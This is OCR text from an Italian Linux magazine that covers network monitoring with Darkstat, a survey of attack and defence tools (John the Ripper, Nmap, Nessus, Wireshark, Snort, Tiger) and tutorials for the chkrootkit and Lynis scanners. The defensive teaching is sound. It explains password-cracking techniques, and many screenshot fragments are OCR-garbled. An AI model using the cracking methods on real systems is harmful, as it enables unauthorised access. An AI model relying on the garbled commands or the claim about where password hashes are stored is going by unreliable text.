last 60 seconds 
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L'INTERFACCIA WEB 

Per visualizzare i dati raccolti, apriamo il browser 

(dallo stesso PC nel quale è installato Darkstat) e di- 
gitiamo localhost:667. Appare quindi una schermata che ci mo- 
stra vari grafici relativi alla LAN. Clicchiamo su Automatic reload 
is: off per aggiornarli in tempo reale. 
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Clicchiamo su Host (nella parte alta dell'interfaccia 

web) per vedere apparire l'elenco di tutti gli host 
connessi alla rete locale. Per ognuno di essi Darkstat offre un 
dettaglio dei pacchetti inviati e ricevuti. Se vogliamo scoprire 
ulteriori dettagli, ci basta cliccare sul pulsante Full Table. 


» Darkstat 


rta stona 

te porte e gl ninrvnit Gi sorta Seni da vegoie. ad esempeo: 30. S6 - 60. 63300 - 15910) 
sno inervaio Si pone per 6 porta rame 

na rta 

me porte e gl iiarunt di porta divisi ds vegeta. ad esempio: DO $$ - 60. 69500 - 65310) 
i 


ACCESSO REMOTO... 

Un sistema di monitoraggio è utile soprattutto se pos- 

siamo effettuare controlli da remoto. Accediamo al 
pannello di gestione del router e apriamo la porta 667. La proce- 
dura varia in base al dispositivo in proprio possesso. 


in ® min: 0.0 KB/s, avg: 0.2 KB/s, max: 2.9 KB/s 

out ® min: 0.1 KB/s, avg: 0.4 KB/s, max: 5.1 KB/s 
last 60 seconds 

COSA VUOL DIRE? 

| quattro grafici ci consentono di monitorare l'anda- 
mento della rete negli ultimi 60 secondi, 60 minuti, 24 
ore e 31 giorni. Gli istogrammi chiari rappresentano i pacchetti in 
uscita e quelli scuri quelli in entrata. Possiamo osservare i picchi di 
utilizzo della rete la velocità massima, media e minima della rete. 


in® min: 0.1 KB/s, avg: 0.7 KB/s, max: 12.2 KB/s 
out ® min: 0.1 KB/s, avg: 0.2 KB/s, max: 4.8 KB/s 
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ANALISI APPROFONDITA \ 

Cliccando sul nome del singolo host vengono fornite 

informazioni sulle porte e protocolli usati da quello 
specifico host. Tra questi dati, troviamo anche il numero di pac- 
chetti in uscita/entrata e il numero di pacchetti SYN. Avremo 
quindi un rapido resoconto di cosa succede sulla rete. 
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«sE MONITORING! 

Il nostro consiglio è quello di affidarci ad un dominio 

offerto da un servizio di DNS dinamico (ad esempio 
DynDNS). Superata questa fase, ci basta raggiungere il dominio 
a noi assegnato per vedere apparire l'interfaccia web di Darkstat. 


cess 
cese 
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CYBER SECURITY: 
ATTAGCO 
E DIFESA 


I software utilizzati dai pirati per violare la sicurezza 
delle reti sono gli stessi che possiamo utilizzare 
per difenderci: studiamoli a fondo e corriamo ai ripari 


x NU/Linux supporta una tonnellata di strumenti e utilità 
(Gr il cracking delle password, per scovare eventuali 
vulnerabilità di rete, per scansionare gli host connessi 

alla stessa LAN e per il rilevamento di eventuali intrusioni. 
Uno dei grandi vantaggi di utilizzare una qualsiasi distro GNU/ 


Linux è che la sua sicurezza tende ad essere molto migliore 
di quello dei concorrenti alternativi e proprietari. Questo è 
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® Fig. 2 * Un esempio di una comunicazione sicura 


dovuto in gran parte al modo in cui il kernel Linux assegna i 
permessi, ma è anche vero che il nostro sistema operativo Open 
Source viene preso di mira da autori di malware molto meno 
frequentemente di Windows. Resta il fatto, tuttavia, che nessun 
sistema operativo è perfettamente sicuro, proprio come abbiamo 
scoperto nella Cover Story di questo numero (pag. 16). In ogni 
caso, GNU/Linux è un sistema operativo molto popolare per gli 
hacker ed i cracker. 

Ci sono due ragioni principali alla base di questo. Prima di 
tutto, il codice sorgente del kernel Linux è liberamente dispo- 
@ Fig. 1 * Attacchi alla sicurezza di un sistema operativo nibile perché è un sistema operativo Open Source. Questo signi- 
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fica che il kernel Linux è molto facile da modificare o perso- 
nalizzare. In secondo luogo, ci sono innumerevoli distribuzioni 
GNU/Linux specializzate in sicurezza che includono software 
di hacking: gli utenti malintenzionati utilizzano in genere stru- 
menti come password cracker, scanner di rete e il software di 
rilevamento delle intrusioni. 

Questi strumenti di hacking hanno finalità diverse e sono uti- 
lizzati per una vasta gamma di attacchi. Un password cracker è 
sviluppato per la decodifica di chiavi di sicurezza in una varietà 
di formati, come ad esempio le password criptate o hash. Molte 
distribuzioni di cracking offrono funzionalità aggiuntive come 
ad esempio rilevatori di rete e packet sniffing wireless. 

E grazie a questi strumenti, molti utenti malintenzionati scopro- 
no un modo semplice per ottenere l'accesso ad una rete azienda- 
le, a database, directory riservate e tanto altro ancora. 

Gli scanner di rete, poi, vengono utilizzati per rilevare altri 
dispositivi in rete: in tal modo, gli aggressori sono in grado di 
sviluppare una mappa virtuale della rete. Oltre a scoprire altri 
dispositivi, molti scanner di rete sono in grado di raccogliere 
dettagli inerenti il dispositivo, come ad esempio il tipo di siste- 
ma operativo utilizzato, i software in esecuzione ed eventuali 
firewall. Fortunatamente, ci sono varie misure che possiamo 
adottare per ridurre il rischio di eventuali minacce. E molte 
di queste procedure di sicurezza, ironia della sorte, fanno uso 
degli stessi strumenti utilizzati dai malintenzionati per assalire 
il nostro sistema operativo. Infatti, utilizzando gli stessi stru- 
menti di cui abbiamo accennato poco fa, possiamo testare il 
software installato nei nostri PC e, più in generale, la sicurezza 
della nostra rete locale. Per questo motivo, abbiamo deciso di 
affrontare un po' di teoria, assolutamente necessaria per meglio 
comprendere le tecniche utilizzate dai malintenzionati per sfer- 
rare attacchi verso il nostro sistema operativo o la nostra rete 
locale: sono conoscendo le mosse del nemico potremo attuare 
adeguati piani di difesa. Se uno dei software che analizzeremo 
metterà alla luce falle di sicurezza, beh, sarà assolutamente il 
caso di porre rimedio. 


LE MINACCE PIÙ COMUNI 


Alcune tecniche sono ben note a tutti noi. Altre, invece, sono 
spesso sottovalutate o del tutto ignote agli occhi degli utenti. In 
linea di massima, però, si tratta quasi sempre di software (in- 
stallati nel PC della vittima) capaci di memorizzare e trasmette- 
re in remoto le credenziali dell'utente o, in alternativa, causare 
disagi senza compromettere la privacy dei dati memorizzati nel 
computer. 

Di seguito è riportato l'elenco di alcune minacce note: 


* Trojan Horse: memorizza i dati per inviarli ad un utente ma- 
lintenzionato che può in seguito loggarsi al PC e accedere 
alle risorse del sistema; 

* Trap door: se un programma ha un buco di sicurezza nel suo 
codice, può eseguire un'azione illegale senza che l'utente ne 
venga a conoscenza; 

* Logic Bomb: è una situazione in cui un programma si com- 
porta non secondo i suoi canoni solo quando determinate 


@ Fig. 3 * Layout generale di un sistema di crittografia/ 
decrittografia 


condizioni sono soddisfatte, altrimenti funziona come un 
software vero e proprio; ) 

* Virus: altamente pericoloso e può modificare/cancellare i 
file degli utenti. Un virus è generalmente un piccolo codice 
incorporato in un software. Non appena l’utente vi accede, 
il virus può rendere il sistema inutilizzabile; 

* Worm: genera molteplici copie di sé stesso impedendo a 
tutti gli altri processi di ottenere le risorse necessarie. I pro- 
cessi worm possono anche spegnere un'intera rete! 

* Port Scanning: un meccanismo o mezzo attraverso il quale 
un hacker può rilevare le vulnerabilità del sistema per at- 
tuare un attacco; 

* Denial of Service: questa tecnica impedisce all'utente di 
utilizzare normalmente il sistema. 


All'interno di un determinato dell'architettura di un PC, la tra- 
smissione di messaggi è sicura semplicemente perché il sistema 
operativo conosce esattamente il destinatario ed il mittente del 
messaggio stesso (comunicazione fra periferiche e componenti). 
Ma su una rete (locale o globale che sia) le cose cambiano: un 
PC “canaglia” può falsificare la propria identità e smistare a 
destinatari differenti un messaggio in realtà indirizzato ad altri. 
La criptografia può aiutare a risolvere i problemi, specialmente 
se associata ad un sistema di chiavi pubbliche e private (Fig. 2). 


MECCANISMI DI PROTEZIONE 


Un sistema di sicurezza informatico è inteso a fornire (Fig. 1) 
una protezione per le risorse del PC (come CPU, memoria, di- 
sco, software e soprattutto informazioni memorizzate). Se un 
programma è gestito da utenti non autorizzati può provocare 
gravi danni al PC e/o ai dati in esso contenuti. Resta inteso, 
dunque, che un sistema informatico che si rispetti deve essere 
protetto contro gli accessi non autorizzati. Per fare ciò, è sempre 
bene adottare politiche di autenticazione (ovvero, identificare 
ciascun utente del sistema associando i programmi in esecuzio- 
ne a tali utenti). I sistemi operativi, generalmente, identificano 
gli utenti utilizzando differenti metodi: 
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e username/password: è necessario inserire un nome utente e 
la password registrati per accedere al sistema; 
e scheda utente/chiave: l'utente deve immettere la chiave ge- 
nerata dal generatore di chiavi del sistema operativo; 
© * attributo utente (impronta digitale/retina/ firma): l'utente 
deve identificarsi mediante una webcam o un lettore di im- 
pronte digitali. 


La one-time password fornisce poi una sicurezza aggiuntiva. Si 
tratta di una password unica richiesta ogni volta che l'utente 
tenta di accedere al sistema. Dopo aver utilizzato una password 
monouso, quest'ultima non potrà essere utilizzata una seconda 
volta. 


TIGER 


Tiger è uno strumento di sicurezza che ci permette di rilevare 
eventuali intrusioni nel sistema. Esso supporta più piattaforme 
UNIX ed è distribuito con licenza GPL. A differenza di altri 
tool, ha alcune caratteristiche abbastanza interessanti, tra cui 
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Developed by Texas ARR U 


RUI try to check using config for 'x86_64' running Linux 3.5.0-17-genertc 
andosc] Using configuration files for Linux 3.5.8-17.generic 
iguratlon files for generic Linux 3 
Tiger security scripts *** 3.2.3, 2008.09.10.09.39 se» 
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un design modulare facilmente espandibile. Tiger integra un si- 
stema IDS (Intrusion Detection System) capace di controllare 
anche l'integrità e lo stato del sistema. Per la sua configurazio- 
ne, è necessario agire su due differenti file: cronrc e tigerrc. A 
configurazione ultimata, Tiger ci fornisce un documento HTML 
facilmente consultabile da qualsiasi PC o smartphone equipag- 
giato di un browser (Fig. 4). 

Per installare Tiger digitiamo il seguente comando: 


$ sudo apt-get install tiger 

E quindi: 

$ sudo tiger -H 

Per conoscere tutte le opzioni disponibili. Tiger è installato in 
locale, viene eseguito come root, e controlla il localhost per pro- 


blemi comuni di configurazione di sistema in materia di sicu- 
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| gcc calc_stat.o -s -L/usr/local/lib -L/usr/local/ssl/lib -lssl -lerypto -la -L 
-lerypt -ldl -0 .. 
gec -c «Wall -02 -fomit-frame-pointer 
finclude -DHAVE_CRYPT -DHAVE_DL 
goc tgtsnarf.o -s -L/usr/local/lib 
lerypt -Ldl -0 ../run/tgtsnarf 
ra -f {run/racf2john 
In -s john ../run/racf2john 
make[1]: Nothing to be done for * 
rm -f ../run/hccap2john 
In -s john ../run/hccap2john 
|rm -f ../run/pwsafe2john 
+./run/pwsafe2 john 
fonit-framne-pointer 
finclude DHAVE_CRYPT -DHAVE_DL 
gcc rau2dyna.o -s -L/usr/local/lib 
Lerypt -Ldl -G6 ../run/ram2dyna 
-f ../run/keepass2john 
$s john /run/keepass2john 
f ../run/keychain2john 
*$ john ../run/keychain2john 
f ../run/john.local.conf ] |] touch ../run/john.local.conf 
make[1]: Leaving directory "/opt/john/src' 
Irootelinuxpitston:/oot/tohn/sret 


® Fig. 5 * Fase di installazione di John the Ripper 


Wdeclaration-after-statenent 
funroll-loops tgtsnarf.c 
L/usr/local/ssl/lib -lssl 


I/usr/loc: 


lerypto 


+/run/nmozillazjohn'. 


ln -s john 
gee -c «Wall -02 


Wdeclaration-sfter-statenent 
funroll-loops raw2dyna.c 
L/usr/local/ssl/lib -lssl 


Ifusr/loc: 


lerypto -Ila -lz 


rezza. Tiger non è un monitor di rete (come ad esempio Nagios) 
o un sistema di gestione dei pacchetti (come apt). Tiger ha una 
serie completa di controlli incorporati ed è portatile con requi- 
siti minimi. Esso viene eseguito come root, in modo che possa 
fare un'analisi molto approfondita del sistema che programmi 
come Nagios non riescono a fare. Al tempo stesso, Tiger è mol- 
to leggero: non ci sono demoni, database o connessioni di rete 
necessarie. 


JOHN THE RIPPER 


John the Ripper (Fig. 5) è uno strumento software di cracking 
password gratuito inizialmente sviluppato per il sistema opera- 
tivo UNIX. Si tratta di uno dei più popolari programmi di test 
in quanto unisce una serie di password cracker in un unico pac- 
chetto, rileva automaticamente i tipi di hash di password e com- 
prende un cracker personalizzabile. Può essere eseguito contro 
vari formati di password criptate tra cui diversi tipi di hash 
password più comunemente utilizzati (DES, MDS o Blowfish). 
Grazie a dei moduli aggiuntivi, poi, è possibile estendere la sua 
capacità di comprendere gli hash delle password MD4-based e 
anche quelle memorizzate in LDAP, MySQL e altri. Una delle 
tecniche utilizzate da questo tool per testare la sicurezza di una 
password è l'attacco di tipo dizionario. In poche parole, vengono 
utilizzate delle stringhe di testo (tutte incluse in un unico file di 


citjano©Coltjano-desktop: = 


oltjanofoltjano-desktop:-S$ nmap 
Nmap 6.00 ( http://nmap.org ) 
Usage: nmap [Scan Type(s)] [Options] {target specification) 
TARGET SPECIFICATION: 
Can pass hostnames, IP addresses, networks, etc. 
Ex: scanne.nmap.org, microsoft.con/24, 192.1685.0.1; 10.0.0-255.1-254 
-LL <inputfilenane>: Input from list of hosts/networks 
iR <num hosts>: Choose random targets 
-exclude <hosti[,host2][,host3],...>: Exclude hosts/networks 
--excludefile <exclude_file>: Exclude list from file 
HOST DISCOVERY: 
-SL: List Scan 
“sn: Ping Scan - 


simply list targets to scan 
disable port scan 
«Pn: Treat all hosts as online -- 
-PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports 
PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes 
-PO[protocol list]: IP Protocol Ping 

«n/-R: Never do DNS resolution/Almays resolve [default: sometines] 


skip host discovery 


dns-servers <servi[,serw2],...>: 
--System-dns: Use 05"s DNS resolver 
tracerout Trace hop path to each host 
SCAN TECHNIQUES: 
-35/sT/sA/sW/sN: TCP SYN/Connect()/ACK/Window/Maimon scans 


Specify custom DNS servers 


@ Fig. 6 * Ecco le opzioni utilizzabili in Nmap 
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testo contenente parole di utilizzo comune o sequenze casuali di 
numeri e lettere) come campione che viene poi confrontato con 
l'output della stringa crittografata. Se la sequenza corrisponde, 
la password è stata scovata. Ma l'attacco di tipo dizionario, non 
è l'unica tecnica utilizzata da John the Ripper. Il tool offre infat- 
ti anche una modalità “forza bruta” (bruteforce). In questo tipo 
di attacco, il programma passa attraverso tutti i i possibili testi 
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® Fig. 7 * Un rapporto di sicurezza ottenuto grazie a Nessus 


in chiaro per poi confrontarli con l'hash di ingresso: usa tabel- 
le per cercare testi in chiaro contenenti caratteri utilizzati più 
frequentemente. È evidente, dunque, che questo tipo di attacco 
è utile per il cracking delle password che non compaiono negli 
elenci di parole contenute nel dizionario utilizzato dal malinten- 
zionato. Di contro, questo metodo è molto costoso in termini di 
tempo: a seconda della complessità della chiave, potrebbero es- 
sere necessarie settimane (o mesi) per scovare la giusta chiave. 
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Ethernet II, Src: 


Analyzed 524 Packets Per Minute 
Analyzed 7 Packets Per second 


received 524 packets 
Analyzed: 521(99.427%) 
Dropped: 0(0.000%) 
outstanding: 3(0.573%) 
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® Fig. 9 * Le statistiche raccolte da Snort 


GLI SCANNER DI RETE 


Nei precedenti paragrafi abbiamo accennato anche all'uso di 
scanner di rete che consentono ad estranei di ottenere informa- 
zioni relative alla nostra rete locale (domestica o aziendale che 
sia). Fra i tool di questo genere più apprezzati sia dai malinten- 
zionati che da chi ha intenzione di proteggere la propria LAN, 
troviamo Nmap. Questo software viene utilizzato per rilevare 
computer e, più in generale, dispositivi connessi alla stessa rete, 
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® Fig. 8 * Wireshark in azione durante l'analisi di una rete senza fili 
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creandone così una “mappa”. Proprio come molti altri software 
dello stesso genere, Nmap è in grado di scoprire i servizi attivi/ 
passivi di una LAN, includendo anche quelli che non sono dotati 
di un protocollo di rilevamento. Inoltre, Nmap è anche in grado 
di determinare numerosi dettagli relativi ai PC connessi: questi 
includono il sistema operativo utilizzato, il tipo di dispositivo, 
il tempo di attività e software che utilizzano particolari servizi 
di rete. Caratteristica abbastanza importante è anche il rileva- 
mento di eventuali firewall attivi su ogni singolo PC della LAN. 
Altro tool del tutto simile a Nmap è Nessus. Il suo obiettivo 
è quello di rilevare potenziali vulnerabilità sui sistemi collau- 
dati come misconfiguration (ovvero configurazioni di sicurezza 
mancanti) o password di default non modificate dagli utenti. E la 
sua affidabilità è dimostrata dal numero di organizzazioni che si 
affidano proprio a Nessus per testare la sicurezza delle proprie 
reti: stiamo parlando di circa 75000 installazioni attive. 


I PACKET SNIFFER 


Fra questa categoria di software, Wireshark è senza dubbio al- 
cuno l'applicazione più utilizzata per la risoluzione di problemi 
di rete.o per l'analisi e lo sviluppo di protocolli di comunica- 
zione. E grazie ad una semplice GUI e alle molte opzioni di 
filtraggio, l'utilizzo di questo software il più delle volte appare 
abbastanza banale. Wireshark consente all'utente di osservare 
tutto il traffico in transito sulla rete (sia quello in ingresso che 
quello in uscita). Il tutto sta nel settare la cosiddetta modali- 
tà promiscua sull'interfaccia di rete utilizzata: purtroppo (o per 
fortuna), non tutte le schede Wi-Fi attualmente in circolazione 
sono compatibili con questa modalità. Con la recente release 2.0 
(che abbiamo già avuto modo di analizzare nel numero 166 di 
Linux Magazine - Marzo/Aprile 2016), gli sviluppatori hanno 
reso l'interfaccia grafica di Wireshark ancora più semplice ed 
immediata: effettuare packet sniffing è un gioco da ragazzi an- 
che per i malintenzionati alle prime armi. 

Ma Wireshark, come già detto, non è l'unico software specializ- 


X Intercepter-NG 


Fig. 10 * Schema generale di Zephyr, 
OS attualmente in sviluppo 


zato nel settore. Una valida alternativa è Kismet, un packet snif- 
fer per reti cablate e senza fili. È compatibile con con qualsiasi 
scheda wireless che supporta la modalità di monitoraggio, e può 
fiutare traffico 802.1a/b/g e, a differenza di molti altri rilevatori 
di rete, funziona passivamente. Ciò significa che senza l'invio di 
alcun pacchetto conforme al protocollo, è in grado di rilevare 
la presenza di entrambi i punti di accesso (hotspot e client) e 
associarli tra loro. 


RILEVIAMO LE INTRUSIONI 


Snort è un Network Intrusion Prevention System (PIN) ed è 
capace anche di rilevare eventuali intrusioni (NIDS). Esegue la 
registrazione dei pacchetti e analizza il traffico in tempo reale 
sulla rete in esame. Snort esegue l'analisi di protocollo, il con- 
tenuto di ricerca/corrispondenza ed è comunemente utilizzato 
per bloccare attivamente o rilevare passivamente una varietà di 
attacchi e scansioni, come buffer overflow (di cui abbiamo am- 
piamente parlato nella Cover Story di questo numero a pagina 


androidwifihackingapps.com : 192.168.0.4 
androlidwifihackingapps.com:192.168.0.4 
www.Irb.co.uk : 192.168.0.4 


@Fig. 11 * I packet sniffer sono disponibili anche per Android: Intercept-NG è solo una delle app di questo genere 
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16), scansioni di porte invisibili, attacchi alle applicazioni Web, 
sonde SMB e tentativi di OS fingerprinting. Il software è in gran 
parte utilizzato per scopi di prevenzione delle intrusioni, facen- 
do cadere gli attacchi in corso. Snort può essere combinato con 
altri software come SnortSnarf, Sguil, OSSIM e Basic Analy- 
sis and Security Engine (BASE) per fornire una rappresenta- 
zione visiva dei dati di intrusione. Ma, che sia Nmap, Nessus, 
Snort o qualsiasi altro programma, non dobbiamo mai dimen- 
ticare una costante: nessun software ci può garantire l'affidabi- 
lità massima. Basta un rootkit scritto a dovere per bypassare il 
controllo di qualsiasi tool atto a difendere il nostro sistema o la 
nostra rete locale. 


® Fig. 12 « Il generatore di password pwgen 


SIAMO DAVVERO AL SICURO? 


Tutto ciò che ci circonda è mosso da un sistema operativo, GNU/ 
Linux o proprietario che sia. Basti pensare agli enormi cambia- 
menti attuati (ed in corso d'opera) nel settore automotive: auto- 
veicoli capaci di guidare in piena autonomia o, per ritornare alla 
vita di tutti i giorni, sistemi di sicurezza completamente compu- 
terizzati che frenano al posto nostro in caso di necessità. Appare 
evidente, dunque, come la sicurezza sia un elemento fondamen- 
tale che, a differenza di qualche anno fa, non solo ci difende da 
eventuali perdite di dati, ma nei casi più esasperati, ci può addi- 
rittura salvare la vita. In ambito prettamente informatico, poi la 
sicurezza dovrebbe (il condizionale è purtroppo d'obbligo) avere 
tre differenti obiettivi: riservatezza, integrità e disponibilità (il 
mancato rispetto di quest'ultimo obiettivo prende il nome di “ne- 
gazione del servizio”). Il più delle volte, però, l'unica caratteri- 
stica di sicurezza che viene presa in considerazione dagli utenti 
e dalle aziende è la password. Cosa non poi del tutto sbagliata, 
a patto di utilizzare delle chiavi sufficientemente. complesse e 
difficili da indovinare. Eppure, basta fare una rapida ricerca sul 
Web per scoprire che numerosi rapporti di sicurezza mettono 
in luce un serio problema. Migliaia (se non milioni) di utenti 
in tutto il mondo si affidano a chiavi davvero banali (*1234”, 
il proprio nome o la data di nascita). È quasi inutile precisare 
quanto una misura di sicurezza del genere sia del tutto inutile 
ed errata. La maggior parte delle distribuzioni GNU/Linux in- 
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cludono programmi come pwgen che ci permettono di generare 
delle password di lunghezza variabile (e definita dall'utente) con 
caratteri del tutto casuali). Meglio affidarsi a soluzioni di questo 
tipo! Al tempo stesso, però, non dovremmo cullarci sugli allori 
di una password apparentemente sicura. La maggior parte dei 
sistemi Unix (e GNU/Linux non fa accezione) utilizzano un al- 
goritmo di crittografia delle password a senso unico, chiamato 
DES (Data Encryption Standard). La chiave crittografata, vie- 
ne poi conservata (in genere) nel percorso /etc/passwd o, meno 
frequentemente in /etc/shadow. Quando si tenta un login, la pas- 
sword che si digita viene nuovamente crittografata e confrontata 
con la voce del file nella quale è memorizzata in locale. Se le 
due chiavi corrispondono, la password è evidentemente identica 
e l'accesso viene consentito. Per un utente malintenzionato che 
ha accesso locale (o remoto) al nostro PC, basta raggiungere la 
directory nella quale è memorizzata la chiave crittografata per 
semplificare (e non di poco!) la sua ricerca. Per questo e per 
altri motivi (ad esempio alleggerire l'elaborazione generale della 
CPU) il supporto per funzioni di crittografia basate su hardware 
è in netta crescita e diversi nuovi algoritmi-hanno ottimizzato 
implementazioni assembler su architetture comuni, 


CHE FUTURO CI ATTENDE? 


Nel corso degli anni, numerose misure di sicurezza sono sta- 
te implementate su diversi fronti. HTTPS, ad esempio, è ormai 
divenuto uno standard: offre privacy, autenticazione e integrità 
dei dati trasferiti, funzionalità queste molto utili, ad esempio, 
nello shopping on-line o nell'home banking. Così come il WEP 
risulta ormai obsoleto, proprio per la semplicità con la quale 
un malintenzionato è oggi in grado di scardinarne la sicurez- 
za: bastano infatti solo pochi minuti per scovare la chiave di 
sicurezza di una rete senza fili protetta con una chiave WEP. 
Il WPA2, invece, è ancora in grado di proteggere adeguatamen- 
te gli utenti, ma chissà ancora fino a quando. Già, perché mentre 
continuiamo a vedere sempre più dispositivi collegati alla rete 
Internet, dobbiamo al tempo stesso riconoscere che essi saran- 
no vulnerabili ad una qualche tipologia di attacco. Pensiamo 
all’IoT, un futuro dove tutto è connesso: tutti i futuri dispositi- 
vi saranno “intelligenti” pronti a svolgere le proprie funzioni e 
un hacker che si intromette farebbe solo “danni”. Dispositivi di 
questo tipo sono progettati per riconoscere o “imparare” quando 
un utente si trova a casa o quando è a lavoro, in modo che pos- 
sano ottimizzare, ad esempio, l'energia utilizzata, per riscaldare 
e raffreddare le mura domestiche. Abbiamo idea di quanti ulte- 
riori dati potrebbero finire nelle mani sbagliate? L'IoT è appena 
iniziato a diffondersi e lo farà sempre di più. La Linux Founda- 
tion ha annunciato, il 17 febbraio 2016, il progetto Zephyr, un 
piccolo e scalabile sistema operativo destinato a sistemi con 
risorse limitate. La sicurezza è dunque la chiave per tutti i di- 
spositivi dell'IoT: l'ultima cosa di cui gli utenti hanno bisogno è 
sapere che i loro dispositivi collegati possono essere manipolati 
da un qualche malintenzionato. La Linux Foundation comprende 
pienamente questa problematica e proprio per questo motivo ha 
deciso di investire risorse e tempo per realizzazione un sistema 
sicuro e che non faccia impensierire inutilmente i propri utenti. 


se 
Maggio/Giugno 2016 © s85 


VIA I VIRUS 
DAL TUO 
SERVER! 


Rootkit e malware sono i principali nemici 
di GNU/Linux: ecco come tenerli alla larga 
utilizzando i migliori tool in circolazione 


a sicurezza informatica non è una cosa da prendere alla leggera. E ciò 
è ancor più vero quando ci si trova a dover gestire dei web server: 
il pericolo rootkit è in questo caso, infatti, sempre dietro l'angolo. 
Proprio per questo motivo abbiamo deciso di puntare i riflettori sui migliori 
tool disponibili per GNU/Linux che ci consentono non solo di rimuovere 


eventuali malware già presenti su una macchina, ma che permettono anche 
di mantenere molto elevata la protezione contro eventuali malintenzionati. Il 
tutto, corredato di qualche piccolo suggerimento utile per evitare di incap- 
pare in problematiche di sicurezza. Cos'altro aspettiamo? Rimbocchiamoci 
subito le maniche ed iniziamo questa nuova avventura! 


GhkRootkit: completo e semplice da usare 


Scansioniamo i file del server e scoviamo potenziali minacce 


ftp://ftp.pangeia.com.br 
ar.gz.1 
Risoluzione di ftp.pangeia.com.br (ftp.pangeia.com.br)... 187.33.4. 
Connessione a ftp.pangeia.com.br (ftp.pangeia.com.br)|187.33.4.179 
Accesso come utente ano MOUS ... Accesso eseguito. 
me SYST et Fatto. > PWD ... fatto. 
TYPE I ... fatto. > CÒWD (1) /pub/seg/pac ... 
SIZE chkrootkit.t: z ... 38616 
==> PASV ... fatto. ==> RETR chkrootkit.tar.gz ... 


fatto. 


fatto. 


OTTENIAMO I SORGENTI... 

Otteniamo i sorgenti di ChkRootkit lanciando il co- 

mando wget --passive-ftp ftp://ftp.pangeia.com. 
br/pub/seg/pac/chkrootkit.tar.gz. A download terminato 
scompattiamo il tutto con il comando tar xvfz chkrootkit.tar.gz. 


mario@mario-VirtualBox:-$ sudo chkrootkit 
ROOTDIR is ‘/' 
Checking “amd'... not found 
Checking ‘basename'... not infected 
4 Ff'... not found 
fn'... not infected 
chsh'... not infected 
"cron'... not infected 
= DI 2 Lai e 


File 


Checking 
Checking 
choaeliea 


UN LINK SIMBOLICO 

Per rendere il software eseguibile da terminale cre- 

iamo un link simbolico: sudo In -s /usr/local/chkro- 
otkit/chkrootkit /usr/local/bin/chkrootkit. Infine, eseguiamo 
il programma con sudo chkrootkit. 


-0 Check _mtMpx CNECK_mIMPpx.C 
-Statlc o strings-static strings.c 
: In function ‘main’: 
îng: implicit declaration of function ‘strcenp’ [ 


if (stremp(argv[i], "-a") == 0) continue; 


chkutmp chkutmp. 
2=/c 9. cd... 
rtua :-S sudo mv chkrootkit-0.50/ 


o o-Vi fusr/tocal/chkrootidi 
] password di mario: 


«E COMPILIAMOLI 

Entriamo nella cartella dei sorgenti (cd chkroo- 

tkit-0.50/) e lanciamo make sense per compilare 
il software. Al termine, spostiamo la cartella con il comando 
sudo mv chkrootkit-0.50/ /usr/local/chkrootkit. 


at 5 a.m every week with: 
© S * * 1 tar -zcf /var/backups/home.tgz /home/ 


For more information see the manual pages of crontab(5) 
command 


m h dom mon dow 


12 * * * /usr/local/bin/chkrootkit 2>&1 | mail -s 


"chkroé 


SCANSIONE PROGRAMMATA 

Per eseguire scansioni automatiche, lanciamo 

crontab -e e aggiungiamo 0 12 * * * /usr/local/ 
bin/chkrootkit 2 > &f | mail -s "Risultati scansione" indirizzo 
"mailto:miafdemail.com"fdemail.ext. 


ceco 
ceee 
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Lynis: il guardiano di GNU/Linux 


Anche alcune impostazioni errate possono metterci in pericolo. Lynis ci tiene al sicuro! 


marlo@mario-VirtualBox: - 


rio-Vir 


2016-04-04 62:1 


://c\sofy.com/files/lynis-2.2.0,tar.9gz 
2.2.0.tar.gz 
149,210.134.182, 2401:7c8:20b2:209::1 
9.210,134.182]:443... 
a... 200 OK 
strean] 


connesso 


25 (198K) {app 
"lynis-2.2.0.tar.gz.1 


100%| == = >] 198,07K 


34 (612 KB/s) lynts-2.2.0.tar.gz.1" salvato [20 


i i laox:-$ sudo tar xvfz lynls-2.2.6.tar.gz 
Lynts /CHANGELOG 
lynis/CONTRIBUTIONS.md 

lynis /CONTRIBUTORS 

lynis/FAQ 

lynis/INSTALL 


SCARICHIAMO LYNIS 
01 Accediamo al terminale e da qui lanciamo il 
comando wget https://cisofy.com/files/lynis- 
2.2.0.tar.gz. Terminato il download, digitiamo sudo tar xvfz 
lynis-2.2.0.tar.gz per scompattare l'archivio. Spostiamo i 
file estratti con sudo mv lynis /usr/local/. 


mario@®mario-VirtualBox: - 

Operating systen: Linux 

Operating system nane: Ubuntu 

Operating system version 15,10 

Kernel ve 4,2.0 

x86_64 

mario-VirtualBox 
{Unknown] 
fusr/tocal/lynts/default.prf 
Log file: Jvar/tog/lynts. log 

Report file: /var/log/lynis-report.dat 
Report version: 1.0 

Plugin directory: Jusr/local/lynis/plugins 


file 


Auditor 
Profile 


Checking profile file (/usr/local/lynis/default.prf)... 
Program update status.. 


PPGNO 


[+] Systen Tools 


CONTROLLO COMPLETO 
03 Per controllare anche warning e falle di sicu- 
rezza, affidiamoci al comando sudo lynis audit 
system. La scansione verrà arrestata ripetutamente per 
consentirci di leggere eventuali avvisi e consigli che ci con- 
sentono di incrementare la sicurezza della macchina. 


indicatin » different fields when the task will be run 
and what « to run for the task 

fo define the tine you can provide concrete values for 
minute (m), h 

and day of 

Notice that tasks will be 
daemon's notion of time and t 


f month month (mon), 
fields (for 'any').# 


on the cron's system 


Output of the crontab jobs (Including errors) is sent through 


l to the user the crontab file belongs to (unless redirected) 
a backup of all your user accounts 
backups/hone tgz /hone/ 
For more information see the manual pages of crontab(5) and cron(8) 
m h don mon dow 


command 


12 * /usr/local/bin/chkrootkit 2>41 mail -s "chkrootkit output of ny server" 
3 * » * /usr/local/bin/lynts --quick 2>&1 | mail -s "lynts output" mia @email.corfl 


OPERAZIONI PIANIFICATE 
[1] Lanciando crontab -e possiamo pianificare le 
scansioni. Aggiungendo ad esempio la stringa 0 
3 * * * /usr/local/bin/lynis --quick 2 > &1 | mail -s “risulta- 
to scansione" indirizzofdemail.ext riceveremo ogni giorno 
(alle 3 A.M.) un report via mail. 


Terminale 1%.e Modifica Vis za Cerca Terminale Aiuto 
:-$ sudo In -s /usr/local/lynts/lynts /usr/local/bin/ly 
S sudo lynis --quick 


[ Lynts 2.2.0 ] 


{IITIIIIt:titt1i:+-:sStitisiiiiiiiitiliitititititi0itititiitilitii cictitiitii0i 

comes with ABSOLUTELY NO WARRANTY. This is free software, and you are 
welcone to redistribute it under the terms of the GNU General Public License 
See the LICENSE file for details about using this software. 


